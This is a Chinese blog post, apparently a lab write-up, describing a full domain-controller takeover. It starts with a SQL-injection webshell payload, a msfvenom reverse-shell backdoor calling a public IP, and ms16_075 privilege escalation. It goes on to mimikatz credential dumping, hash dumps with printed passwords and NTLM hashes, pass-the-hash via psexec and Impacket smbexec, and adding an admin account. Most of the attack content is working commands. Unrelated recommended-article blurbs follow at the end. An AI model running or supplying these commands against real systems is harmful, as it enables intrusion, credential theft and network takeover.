msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本站部分内容由互联网用户自发贡献,该文观点仅代表作者本人,本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规等内容,请联系我们举报!一经查实,本站将立刻删除。

(0)

相关推荐

  • 浙江省纪委书记(浙江省纪检委书记是谁)

    据浙江省纪委监委网站消息,10月1日,省委常委、省纪委书记傅明先赴党的诞生地——嘉兴南湖,瞻仰红船,重温“红船精神”,参观南湖革命纪念馆,看望节日期间坚守一线的干部职工,并调研了解清廉村居建设情况。 上述消息显示,傅明先已任浙江省委常委、纪委书记。 前几日消息,中共中央批准:傅明先同志不再担任山东省委常委、委员职务,另有任用。 傅明先,男,汉族,1964年1…

    投稿 2023-05-30
  • 中通快递单号几位数(中通快递单号几位数字组成正方形的周长)

    如何批量查询快递单号的物流信息,并筛选出正在派送中的所有单号呢?今天小编给大家分享一个新的查询技巧,下面一起来试试吧。 所需工具 安装一个快递批量查询高手 快递单号若干 操作步骤 步骤1:运行【快递批量查询高手】,在“添加单号”中,支持多种导入的方式,比如从TXT文档中、表格模板或者直接复制粘贴 步骤2:小编测试的的时候,选择的是直接复制粘贴,相对来说比较方…

    2023-05-24 投稿
  • 榆树叶用途,榆树叶的功效与作用及药用价值

    遇见榆树别错过,摘点叶子回家,和花生一起蒸,清香入味,好吃 春天是一个“美食季”,在这个季节有各式各样的美食上市,比如说蔬菜、水果、海鲜还有野菜;尤其是野菜类的食物,它们可是春天的象征,被称为春天第一鲜,只有品尝过春天的野菜,才能知晓春天的鲜美。而大家能品尝的鲜美有很多,榆树叶子就是一种,榆树叶子是榆树上的叶子,每年到了春天的时候,榆树上长出鲜嫩的绿叶,这种…

    2023-07-10 投稿
  • 天猫客户运营平台,天猫运营官

    《天猫客户运营平台:提升电商运营效率的关键》 在如今竞争激烈的电商领域,如何有效地运营客户成为了决定企业成败的关键因素之一。 而天猫客户运营平台,作为天猫平台提供的一套强大的客户运营工具,似乎为电商企业打开了一扇通往成功的大门。 一、什么是天猫客户运营平台? 也许你会好奇,天猫客户运营平台到底是什么呢?简单来说,它是天猫为商家打造的一个集客户管理、营销推广、…

    投稿 2025-04-04
  • 江西天沐温泉旅游全攻略, 如何选择最适合自己的天

    江西天沐温泉度假村以温泉为主导产品,它拥有800多年历史的温汤地热温泉,江西天沐温泉度假村从地下470米深处花岗岩中涌出,日出水量7000吨,水质优良,水温常年保持在68℃-72℃,无色无味,具有低矿化度、低钠、富硒、偏硅酸含量高等特点,为国内外罕见富硒温泉,您知道江西天沐温泉的旅游方案吗?江西天沐温泉怎么去?下面小编就为您带来江西天沐温泉旅游全攻略。 江西…

    2023-06-06
  • 西瓜视频怎么拍视频赚钱,西瓜视频中视频赚钱图文教程

    笔者入驻头条一周,发布了十余条视频,但是却没有一点点收益,于是笔者潜心研究视频收益规律,现在分享给大家。 1、用西瓜视频APP上传发布视频。这里一定要记得,必须使用西瓜视频APP发布视频才能有收益,如果像笔者傻乎乎的用今天头条APP发布就不会有任何收益哦!所以想要制作发布视频的伙伴们,赶紧下载个西瓜视频APP吧。大家也不用担心西瓜视频没有粉丝的问题,西瓜和头…

    2022-04-21 投稿
  • cdrx4运行非常慢(文件打开太慢)

    有人反应说用CorelDRAW X7软件进行打开文件、导出文件等一些动作时运行慢,甚至鼠标卡死,为了帮助大家给CorelDRAW X7软件加速,本教程将会有一些解决方案供大家参考。 一. 及时关闭完成的文件或不需要的文件,避免占用太多的内存空间导致CorelDRAW X7运行慢。关闭方法如下: 1. 执行“文件”>“关闭”命令,或者直接单击文件名右侧隐…

    2022-01-04 投稿
  • 开一家成人用品店赚钱吗

    一直看很多大神分享自己的副业很羡慕相比于我只是小打小闹,我的副业有点难以启齿毕竟国人骨子里觉得成人用品比较尴尬,身边除了玩的很好的几个朋友和爱人,父母亲戚很多朋友也都没和说过做了一个成人用品无人售货店。言归正传说说怎么接触这个行业的吧。 我今年28岁,将近到了而立之年,目前只是国企上班小职员,父母做的传统行业(煤矿)也不景气这两年国家环保的政策基本也在考虑转…

    2022-06-04
  • 自己在家织毛衣赚钱(广东85后靓仔心灵手巧织毛衣)

    外地人对广东潮汕地区的第一印象大概就是:重男轻女、会做生意。 据说,当地家庭大多都守着顽固的重男轻女思想,家里有四五个孩子的实属平常。不过,他们生得起也养得起,因为潮汕人很会做生意。 在汕头,就有一位80后帅哥,放弃外企高薪的工作,回乡创业织毛衣,并做得风生水起,在全网积累了千万粉丝,他咋干的?   手工织毛衣一向是女人干的活,而一个帅气的小伙子去…

    2022-01-07 投稿
  • 情侣为什么不能送梳子(古人情侣之间送什么东西)

    从古至今,男女之间的感情都需要有信物来做见证,比如古代所说的红豆表相思,又如现今男女结婚都需要彼此互带戒指以寓意爱情甜蜜长久。其实,定情信物源于古代,多指古代相爱,却不被世俗认可的男女间为了定情所交换的物件。 在中国古代,结婚之前要定亲。和我们现如今的订婚可以理解为一个意思。婚姻遵循“父母之命、媒妁之言”,而处于青春期的少男少女们却迫于礼教和社会压力,以交换…

    投稿 2022-05-11
  • 盲盒是什么意思(盲盒有哪些周边产品)

    随着潮玩影响力的不断扩大,越来越多的网友入坑潮玩。像是游戏日报泡泡身边就有很多入坑盲盒的朋友,不过很多朋友还是只知道盲盒这一种类,对于吊卡、徽章等盲盒的周边却一无所知。不知道盲盒的兄弟姐妹那就太亏了,这些可都是薅羊毛的好东西,下面就跟着泡泡一起看看盲盒的周边产品都有哪些吧?吊卡 盲盒的吊卡虽然指的是一种销售模式,但是在盲盒圈更对人愿意把它称为是“明盒”。之所…

    2022-05-07
  • 蜜蜂用什么呼吸(蜜蜂呼吸法可以立即镇定心绪)

      蜂鸣式呼吸法Bhramari pranayama的名字取自黑色印度蜜蜂Bhramari。蜂鸣式呼吸法可以立即镇定心绪,它是最好的呼吸练习之一,用来释放躁动,沮丧或焦虑,并在很大程度上摆脱愤怒。这种简单的技术,它可以在任何地方练习,不论在工作或家庭中减轻压力的即时选择。这种调息中的呼气类似于蜜蜂的典型嗡嗡声,这就解释了为什么它如此命名,所以又命名…

    2022-05-08